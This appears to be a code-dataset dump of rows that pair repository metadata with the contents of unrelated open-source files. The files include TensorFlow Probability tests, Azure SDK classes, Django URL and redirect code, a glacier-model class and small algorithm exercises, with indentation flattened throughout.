for k in range(4, maxk + 1):
test_trees = list(nx.nonisomorphic_trees(k))
start_time = time.time()
trial = 0
for i in range(len(test_trees) - 1):
for j in range(i + 1, len(test_trees)):
trial += 1
assert tree_isomorphism(test_trees[i], test_trees[j]) == []
print(k, trial, time.time() - start_time)
|
[
"[email protected]"
] | |
a3c03bb30d7ab9d2444696500ece8c13bfd13edd
|
2fabea234735beefc980b77b213fcb0dfb394980
|
/tensorflow_probability/python/math/sparse_test.py
|
aca018215524f5574b3df657c781c4d51d85533d
|
[
"Apache-2.0"
] |
permissive
|
tarrou/probability
|
0eee452b525a6e6b3c7c98d467468e47f07e861b
|
d4d80a1c04ad0b3e98758ebc3f7f82887274384d
|
refs/heads/master
| 2020-08-08T11:16:42.441268 | 2019-12-06T17:35:17 | 2019-12-06T17:35:17 | 213,819,828 | 0 | 0 |
Apache-2.0
| 2019-10-09T04:20:19 | 2019-10-09T04:20:19 | null |
UTF-8
|
Python
| false | false | 6,549 |
py
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sparse ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_case
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
def _assert_sparse_tensor_value(test_case_instance, expected, actual):
test_case_instance.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case_instance.assertAllEqual(expected.indices, actual.indices)
test_case_instance.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case_instance.assertAllEqual(expected.values, actual.values)
test_case_instance.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case_instance.assertAllEqual(expected.dense_shape, actual.dense_shape)
@test_util.run_all_in_graph_and_eager_modes
class SparseTest(test_case.TestCase):
# Copied (with modifications) from:
# tensorflow/contrib/layers/python/ops/sparse_ops.py.
def test_dense_to_sparse_1d(self):
st = tfp.math.dense_to_sparse([1, 0, 2, 0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.int32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([1, 2], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_float(self):
st = tfp.math.dense_to_sparse([1.5, 0.0, 2.3, 0.0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.float32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllClose([1.5, 2.3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_bool(self):
st = tfp.math.dense_to_sparse([True, False, True, False])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.bool)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([True, True], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str(self):
st = tfp.math.dense_to_sparse([b'qwe', b'', b'ewq', b''])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([b'qwe', b'ewq'], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str_special_ignore(self):
st = tfp.math.dense_to_sparse(
[b'qwe', b'', b'ewq', b''], ignore_value=b'qwe')
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[1], [2], [3]], result.indices)
self.assertAllEqual([b'', b'ewq', b''], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_2d(self):
st = tfp.math.dense_to_sparse([[1, 2, 0, 0], [3, 4, 5, 0]])
result = self.evaluate(st)
self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
def test_dense_to_sparse_3d(self):
st = tfp.math.dense_to_sparse(
[[[1, 2, 0, 0],
[3, 4, 5, 0]],
[[7, 8, 0, 0],
[9, 0, 0, 0]]])
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_1d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([0, 100, 0, 3], np.int32), shape=[None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual([[1], [3]], result.indices)
self.assertAllEqual([100, 3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_unknown_3d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([[[1, 2, 0, 0], [3, 4, 5, 0]], [[7, 8, 0, 0], [9, 0, 0, 0]]],
np.int32),
shape=[None, None, None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_rank(self):
ph = tf1.placeholder_with_default(
np.array([[1, 2, 0, 0], [3, 4, 5, 0]], np.int32), shape=None)
st = tfp.math.dense_to_sparse(ph)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0],
[0, 1],
[1, 0],
[1, 1],
[1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
if __name__ == '__main__':
tf.test.main()
|
[
"[email protected]"
] | |
f37f65c77fc2cbe630313fe9779572d9243628eb
|
96aa2367affe0dff353e1aaac8713ded087c5f68
|
/utils/spiderPlot_SA.py
|
335ed09082b623795670281ed3731ae77c81e7d3
|
[
"Apache-2.0"
] |
permissive
|
NMTHydro/Recharge
|
0fcca9a72b631d6c3834c62b84dfb096da6cb210
|
bbc1a05add92064acffeffb19f04e370b99a7918
|
refs/heads/develop
| 2020-05-21T17:39:37.702622 | 2020-04-08T17:10:40 | 2020-04-08T17:10:40 | 60,631,952 | 8 | 1 | null | 2016-10-26T17:01:21 | 2016-06-07T17:13:30 |
Python
|
UTF-8
|
Python
| false | false | 5,333 |
py
|
# ===============================================================================
# Copyright 2016 dgketchum
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance
# with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =================================IMPORTS=======================================
import os
import matplotlib.pyplot as plt
from matplotlib import rc
from numpy import linspace, array, add, multiply, set_printoptions
from pandas import read_pickle, set_option, options
def round_to_value(number, roundto):
return round(number / roundto) * roundto
rc('mathtext', default='regular')
set_option('display.max_rows', None)
set_option('display.max_columns', None)
set_option('display.width', None)
set_option('display.precision', 3)
options.display.float_format = '${:,.2f}'.format
set_printoptions(threshold=3000, edgeitems=5000, precision=3)
set_option('display.height', None)
set_option('display.max_rows', None)
TEMPS = range(-5, 6)
ALL_PCT = [x * 0.1 for x in range(5, 16)]
ndvi_range = linspace(0.9, 1.7, 11)
NDVI_RANGE = array([round_to_value(x, 0.05) for x in ndvi_range])
def make_spider_plot(dataframe, ndvi, all_pct, temps, fig_path=None, show=False):
display_pct = [(int(x)) for x in add(multiply(all_pct, 100.0), -100)]
dfs = os.listdir(dataframe)
print 'pickled dfs: {}'.format(dfs)
filename = '_basic_sensitivity_2.pkl'
if filename in dfs:
df = read_pickle(os.path.join(dataframe, filename))
df.to_csv(os.path.join(fig_path, 'sample_df_basic_2.csv'))
pass
print df
xx = 1
for index, row in df.iterrows():
fig = plt.figure(xx, figsize=(20, 10))
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax3 = ax1.twiny()
fig.subplots_adjust(bottom=0.2)
print 'shape temps: {}, shape row[0]: {}'.format(len(temps), len(row[0]))
ax2.plot(temps, row[0], 'black', label='Temperature (+/- 5 deg C)', marker='8')
ax1.plot(display_pct, row[1], 'blue', label='Precipitation (+/- 50%)', marker='8')
ax1.plot(display_pct, row[2], 'purple', label='Reference Evapotranspiration (+/- 50%)', marker='8')
ax1.plot(display_pct, row[3], 'brown', label='Total Available Water (+/- 50%)', marker='8')
ax3.plot(ndvi, row[4], 'green', linestyle='-.', label='Normalized Density Vegetation\n'
' Index Conversion Factor (0.9 - 1.8)', marker='8')
ax1.plot(display_pct, row[5], 'red', label='Soil Hydraulic Conductivity (+/- 50%)', marker='8')
ax1.set_xlabel(r"Parameter Change (%)", fontsize=16)
ax1.set_ylabel(r"Total Recharge in 14-Year Simulation (mm)", fontsize=16)
ax2.set_xlabel(r"Temperature Change (C)", fontsize=16)
ax2.xaxis.set_ticks_position("bottom")
ax2.xaxis.set_label_position("bottom")
ax2.spines["bottom"].set_position(("axes", -0.15))
ax2.set_frame_on(True)
ax2.patch.set_visible(False)
for sp in ax2.spines.itervalues():
sp.set_visible(False)
ax2.spines['bottom'].set_visible(True)
ax3.set_xlabel(r"NDVI to Crop Coefficient Conversion Factor", fontsize=16)
ax3.xaxis.set_ticks_position("top")
ax3.xaxis.set_label_position("top")
# ax3.spines["top"].set_position(("axes", 1.0))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
for sp in ax3.spines.itervalues():
sp.set_visible(False)
ax3.spines['top'].set_visible(True)
plt.title('Variation of ETRM Pysical Parameters at {}'.format(str(index).replace('_', ' ')),
y=1.08, fontsize=20)
handle1, label1 = ax1.get_legend_handles_labels()
handle2, label2 = ax2.get_legend_handles_labels()
handle3, label3 = ax3.get_legend_handles_labels()
handles, labels = handle1 + handle2 + handle3, label1 + label2 + label3
ax1.legend(handles, labels, loc=0)
if show:
plt.show()
# if fig_path:
# plt.savefig(os.path.join(fig_path, '{}_spider'.format(index)), dpi=600, ext='jpg', close=True,
# verbose=True)
plt.close(fig)
if __name__ == '__main__':
root = os.path.join('F:\\', 'ETRM_Inputs')
sensitivity = os.path.join(root, 'sensitivity_analysis')
pickles = os.path.join(sensitivity, 'pickled')
figure_save_path = os.path.join(sensitivity, 'figures')
make_spider_plot(pickles, NDVI_RANGE, ALL_PCT, TEMPS, figure_save_path, show=True)
# ========================== EOF ==============================================
|
[
"[email protected]"
] | |
516e00001cc17c4e8ab48673154d9f69351bbfe1
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_run_request.py
|
2f2ed7a707c8b543f090be7f386215b7b75e10ce
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 |
MIT
| 2020-10-02T01:17:02 | 2019-05-22T07:33:46 |
Python
|
UTF-8
|
Python
| false | false | 1,824 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .run_request import RunRequest
class TaskRunRequest(RunRequest):
"""The parameters for a task run request.
All required parameters must be populated in order to send to Azure.
:param is_archive_enabled: The value that indicates whether archiving is
enabled for the run or not. Default value: False .
:type is_archive_enabled: bool
:param type: Required. Constant filled by server.
:type type: str
:param task_name: Required. The name of task against which run has to be
queued.
:type task_name: str
:param values: The collection of overridable values that can be passed
when running a task.
:type values:
list[~azure.mgmt.containerregistry.v2018_09_01.models.SetValue]
"""
_validation = {
'type': {'required': True},
'task_name': {'required': True},
}
_attribute_map = {
'is_archive_enabled': {'key': 'isArchiveEnabled', 'type': 'bool'},
'type': {'key': 'type', 'type': 'str'},
'task_name': {'key': 'taskName', 'type': 'str'},
'values': {'key': 'values', 'type': '[SetValue]'},
}
def __init__(self, **kwargs):
super(TaskRunRequest, self).__init__(**kwargs)
self.task_name = kwargs.get('task_name', None)
self.values = kwargs.get('values', None)
self.type = 'TaskRunRequest'
|
[
"[email protected]"
] | |
1b5849466318aa075976375e01fa22fddd690edc
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_08_01/operations/_network_interface_load_balancers_operations.py
|
e42bd6eccf89e6b11dbf117b8ae8f3bcc1bcf2ca
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 |
MIT
| 2020-06-16T16:38:15 | 2019-08-30T21:08:55 |
Python
|
UTF-8
|
Python
| false | false | 5,600 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfaceLoadBalancersOperations(object):
"""NetworkInterfaceLoadBalancersOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceLoadBalancerListResult"]
"""List all load balancers in a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceLoadBalancerListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.NetworkInterfaceLoadBalancerListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceLoadBalancerListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceLoadBalancerListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/loadBalancers'} # type: ignore
|
[
"[email protected]"
] | |
9070f9ba6596fb792ae2d17601a5a9c0581820c3
|
fd8405ac0a5d062907c153f2f2e3569571366539
|
/irbisbooks/core/urls.py
|
17e44ae4a60722f69bb0d5da5d79b7b2b8dec070
|
[] |
no_license
|
ri-gilfanov/irbis-books
|
aab471833035ae51088bccfb0806b863aaba3468
|
0b2a32013ab7f0c0d167e0864a7cb858e8e75add
|
refs/heads/master
| 2021-01-25T13:19:07.818513 | 2018-03-02T09:47:06 | 2018-03-02T09:47:06 | 121,642,933 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 191 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.book_search, name='book_search'),
path('book_download/', views.book_download, name='book_download'),
]
|
[
"[email protected]"
] | |
42d0987e6e1898a0e5f60a297e7db42a013fab6d
|
bcf332d2f6ef6970cfaa480400a112ecee3f16b8
|
/stage07-artist2/s1level42.py
|
c5f34c2ae0814db387a0d43027c8ee7cd714f9b1
|
[
"Unlicense"
] |
permissive
|
skilstak/code-dot-org-python
|
e1907d29f3727060e5064a5eefd68a0f9f4f5c70
|
ba127124386ecfdc20bd84592b3c271f8205d748
|
refs/heads/master
| 2020-04-04T19:34:23.531210 | 2015-07-10T12:39:19 | 2015-07-10T12:39:19 | 26,862,410 | 7 | 4 | null | 2014-11-21T20:28:20 | 2014-11-19T13:24:30 |
Python
|
UTF-8
|
Python
| false | false | 465 |
py
|
"""Stage 7: Puzzle 8 of 11
Here's the solution to the previous puzzle. Can you add just 2 more
lines of code to complete the drawing?
"""
import sys
sys.path.append('..')
import codestudio
artist = codestudio.load('s1level42')
artist.speed = 'faster'
a = artist
for count2 in range(10):
artist.color = artist.random_color()
for count in range(4):
artist.move_forward(20)
artist.turn_right(90)
artist.move_forward(20)
artist.check()
|
[
"[email protected]"
] | |
950b22a78a928e4427896cec1ba0d7c4cac4e011
|
6a4bfff7fcd78a0057401652c7f80d9a95a67267
|
/painless_redirects/tests/test_models.py
|
2f5b98013047caa595a23ef12657abfbbafe3877
|
[
"MIT"
] |
permissive
|
benzkji/django-painless-redirects
|
25987ff984830be7e45b4d0af9a9cd0046beabe7
|
153721486b214ddd5365b6ac5769129562254dd5
|
refs/heads/master
| 2023-05-24T14:23:53.783400 | 2020-06-22T10:35:29 | 2020-06-22T10:35:29 | 22,944,463 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 558 |
py
|
"""Tests for the models of the painless_redirects app."""
from django.test import TestCase
from . import factories
class RedirectModelTestCase(TestCase):
def test_model(self):
obj = factories.RedirectFactory()
self.assertTrue(obj.pk)
def test_redirect_value(self):
obj = factories.RedirectFactory()
self.assertEqual(obj.redirect_value('http'), "/the-new-path/")
obj.new_site = factories.SiteFactory()
self.assertEqual(obj.redirect_value('https'), "https://%s/the-new-path/" % obj.new_site.domain)
|
[
"[email protected]"
] | |
9f99434b0414a1ef779501b64fddd6cde711ca08
|
93022749a35320a0c5d6dad4db476b1e1795e318
|
/issm/giaivins.py
|
8b3e6e1be28e45ec640be9f57bc01bb251bc69f2
|
[
"BSD-3-Clause"
] |
permissive
|
pf4d/issm_python
|
78cd88e9ef525bc74e040c1484aaf02e46c97a5b
|
6bf36016cb0c55aee9bf3f7cf59694cc5ce77091
|
refs/heads/master
| 2022-01-17T16:20:20.257966 | 2019-07-10T17:46:31 | 2019-07-10T17:46:31 | 105,887,661 | 2 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,277 |
py
|
from issm.fielddisplay import fielddisplay
from issm.project3d import project3d
from issm.checkfield import checkfield
from issm.WriteData import WriteData
class giaivins(object):
"""
GIA class definition
Usage:
giaivins=giaivins();
"""
def __init__(self): # {{{
self.mantle_viscosity = float('NaN');
self.lithosphere_thickness = float('NaN');
self.cross_section_shape = 0;
#set defaults
self.setdefaultparameters()
#}}}
def __repr__(self): # {{{
string=' giaivins solution parameters:'
string="%s\n%s"%(string,fielddisplay(self,'mantle_viscosity','mantle viscosity constraints (NaN means no constraint) (Pa s)'))
string="%s\n%s"%(string,fielddisplay(self,'lithosphere_thickness','lithosphere thickness constraints (NaN means no constraint) (m)'))
string="%s\n%s"%(string,fielddisplay(self,'cross_section_shape',"1: square-edged, 2: elliptical-edged surface"))
return string
#}}}
def extrude(self,md): # {{{
self.mantle_viscosity=project3d(md,'vector',self.mantle_viscosity,'type','node')
self.lithosphere_thickness=project3d(md,'vector',self.lithosphere_thickness,'type','node')
return self
#}}}
def setdefaultparameters(self): # {{{
self.cross_section_shape=1;
return self
#}}}
def checkconsistency(self,md,solution,analyses): # {{{
# Early return
if ('GiaAnalysis' not in analyses):
return md
md = checkfield(md,'fieldname','gia.mantle_viscosity','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.lithosphere_thickness','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.cross_section_shape','numel',[1],'values',[1,2])
#be sure that if we are running a masstransport ice flow model coupled with giaivins, that thickness forcings
#are not provided into the future.
return md
# }}}
def marshall(self,prefix,md,fid): # {{{
WriteData(fid,prefix,'object',self,'fieldname','mantle_viscosity','format','DoubleMat','mattype',1);
WriteData(fid,prefix,'object',self,'fieldname','lithosphere_thickness','format','DoubleMat','mattype',1,'scale',10.**3.);
WriteData(fid,prefix,'object',self,'fieldname','cross_section_shape','format','Integer');
# }}}
|
[
"[email protected]"
] | |
fa4c4bebb84eeea7871eaf044e4ec0be599f769c
|
3d9506b859cdbf38a21549cd3d64b69ecde7674e
|
/GoogleCodeJam/2020KickstartRoundB/BusRoute.py
|
b7cceed2c849cd5b217cc8829a02467223137486
|
[] |
no_license
|
bradykim7/Algorithm
|
1ae4c6e4e6d72687b660ddf0768a9174cc8d7b8c
|
053210a1205f4e62b367f85b65dcb60fcad74008
|
refs/heads/master
| 2022-06-25T04:46:55.265058 | 2022-06-17T08:08:52 | 2022-06-17T08:08:52 | 233,500,101 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 349 |
py
|
import sys;
if __name__=='__main__':
t = int(input());
for i in range(t):
nd = input().split();
n=int(nd[0]); d=int(nd[1]);
ans =d;
x= list(map(int,input().rstrip().split()));
for j in x:
ans -= d % j
print('Case #%d: %d'%(i+1,ans))
|
[
"[email protected]"
] | |
5b98146395ad29c6511925bbc47a3402f1251fa2
|
1e168ced1a4bdb53967021e082b98027aea9d38a
|
/1.알고리즘정리/정렬/삽입정렬.py
|
6e0f94afc79ed7d33b51a468d14c6182e85e3d68
|
[] |
no_license
|
vvspearlvvs/CodingTest
|
3ebf921308570ac11eb87e6660048ccfcaf90ce4
|
fc61b71d955f73ef8710f792d008bc671614ef7a
|
refs/heads/main
| 2023-07-13T15:57:11.312519 | 2021-08-25T02:15:28 | 2021-08-25T02:15:28 | 354,232,513 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 282 |
py
|
#삽입정렬
arr = [7, 5, 9, 0, 3, 1, 6, 2, 4, 8]
for i in range(len(arr)):
for j in range(i,0,-1):
if arr[j]<arr[j-1]: #한칸씩 왼쪽으로 이동
arr[j],arr[j-1]=arr[j-1],arr[j]
else:
break
print(arr)
print("최종")
print(arr)
|
[
"[email protected]"
] | |
8b0bcb3eb0687fab864e824994d9b70939870f5d
|
5bcee9248d0bdebb134c61b4d0a3f3113337a569
|
/lesson_0902/01_lists.py
|
816ff09874e0073dca2b2f3d1f0fd9d842bcbb7b
|
[] |
no_license
|
100ballovby/6V_Lesson
|
c2edbc652ea2ebec07eeed60060c16ae4b4792e4
|
4b6dfda323a628558bd63bd5569960004fc335dd
|
refs/heads/master
| 2023-05-08T07:49:14.569854 | 2021-05-25T06:40:53 | 2021-05-25T06:40:53 | 330,888,686 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,044 |
py
|
'''
Список - упорядоченная структура данных, заключенная в квадратные
скобочки. Элементы разделены между собой запятой.
Чтобы создать список, необходимо придумать ему имя, поставить знак принадлежности (=)
и открыть квадратные скобки.
список = [1, 26, 15, 5.6, 'привет, Андрей']
'''
cars = ['audi', 'mercedes', 'toyota', 'skoda', 'seat']
# хочу вывести весь список
print(cars)
# хочу вывести из списка тойоту
print(cars[2])
print(cars[-1]) # вывести последний элемент списка
import random # модуль рандом создает случайности
print('My first car was', cars[random.randint(0, 4)])
# randint(a, b) - выдать случайное число (random int)
# в диапазоне от a до b
print(random.randint(-100, 100))
|
[
"[email protected]"
] | |
b6683e488f292d0548f63346115c9b555ac19d7a
|
b7c1e5d140c3c41e86f206047145f7f296fed53a
|
/Textbook/Chapter 5/pandasSeriesVsDataFrame.py
|
e8417f1cc0a8b2c5317aff757d4ee250887236df
|
[
"MIT"
] |
permissive
|
jlcatonjr/Learn-Python-for-Stats-and-Econ
|
c2fbe29b324e70ceb832beafdd42d0accb37d9f9
|
194671592937562e08c92e0ef5f4793d4911701c
|
refs/heads/master
| 2023-05-11T17:17:05.934290 | 2023-05-10T20:12:10 | 2023-05-10T20:12:10 | 148,912,065 | 22 | 21 | null | null | null | null |
UTF-8
|
Python
| false | false | 300 |
py
|
#pandasSeriesVsDataFrame.py
import numpy as np
import pandas as pd
dataDict = {"range":np.arange(10)}
dataSeries = pd.Series(dataDict)
print(dataSeries)
print(dataSeries["range"])
dataDF=pd.DataFrame(dataDict)
print(dataDF)
print(dataDF["range"])
print(dataDF["range"][5:9])
#print(dataDF.loc[5:9])
|
[
"[email protected]"
] | |
7baa26a26fc7ed616e1f4cfa37d283d39e72ebf3
|
bbdd7f44884844cd0f7332d63945852dc2b53083
|
/mypy_drf_plugin/transformers/fields.py
|
f4f8a10b2f9cc833f0b0e6cedc3fe13340f2fdf9
|
[
"MIT"
] |
permissive
|
private-forks/djangorestframework-stubs
|
e258e1dfc2af80fdf93322338ea3ce5452087e2d
|
18427718c913f3d23ef7a4636c8205df42999cf2
|
refs/heads/master
| 2020-04-25T09:11:04.067894 | 2019-02-24T22:25:03 | 2019-02-24T22:25:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,241 |
py
|
from mypy.nodes import TypeInfo, Var
from mypy.plugin import FunctionContext
from mypy.types import AnyType, Instance, Type, TypeOfAny
from mypy_django_plugin import helpers
def get_private_descriptor_type(type_info: TypeInfo, private_field_name: str, is_nullable: bool) -> Type:
if not type_info.has_readable_member(private_field_name):
return AnyType(TypeOfAny.unannotated)
node = type_info.get(private_field_name).node
if isinstance(node, Var):
descriptor_type = node.type
if is_nullable:
descriptor_type = helpers.make_optional(descriptor_type)
return descriptor_type
return AnyType(TypeOfAny.unannotated)
def fill_parameters_of_descriptor_methods_from_private_attributes(ctx: FunctionContext) -> Type:
default_return_type = ctx.default_return_type
if not isinstance(default_return_type, Instance):
return default_return_type
is_nullable = bool(helpers.parse_bool(helpers.get_argument_by_name(ctx, 'allow_null')))
get_type = get_private_descriptor_type(default_return_type.type, '_pyi_private_get_type',
is_nullable=is_nullable)
return helpers.reparametrize_instance(default_return_type, [get_type])
|
[
"[email protected]"
] | |
e02299e147fabe086c8864cff41d59b0059baa48
|
4da0c8906c9cd671e3a4bee3a6ee801a353e3d9a
|
/Water/Water/urls.py
|
8ce00454b8099894f86046e7d4be2dfd650f7cf9
|
[] |
no_license
|
avpakh/GVK
|
2a5a699caa8a986a3fd0dadbe2160fc9da5bf193
|
ac8b8d8ad5cd5ef8485e98cd532a29cd420e0cae
|
refs/heads/master
